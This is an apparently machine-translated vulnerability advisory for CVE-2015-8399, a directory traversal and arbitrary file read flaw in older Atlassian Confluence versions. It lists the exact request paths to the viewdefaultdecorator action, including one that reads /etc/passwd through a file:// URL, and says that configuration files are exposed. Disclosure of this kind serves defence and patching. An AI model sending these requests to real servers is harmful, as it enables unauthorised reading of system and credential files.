Atlassian Confluence arbitrary file include Vulnerability (CVE-2015-8399)

ID SSV:92416
Type seebug
Reporter LoRexxar
Modified 2016-09-14T00:00:00


Affect the Assembly: Atlassian Confluence

Atlassian Confluence is less than 5. 8. 17 versions of the service exist in the arbitrary file read and directory traversal vulnerabilities

/spaces/viewdefaultdecorator. action? decoratorName=. Lists the current directory /spaces/viewdefaultdecorator. action? decoratorName=/ Lists the web Service's root directory /spaces/viewdefaultdecorator. action? decoratorName=../ Listed on the directory level(for some of the service is invalid) /spaces/viewdefaultdecorator. action? decoratorName=file:///etc/passwd Through the file Protocol can be done read system files and directories

But not root permissions, so the hazard has been reduced, but you can read the web Service's configuration file, so the hazard of any course can not look down upon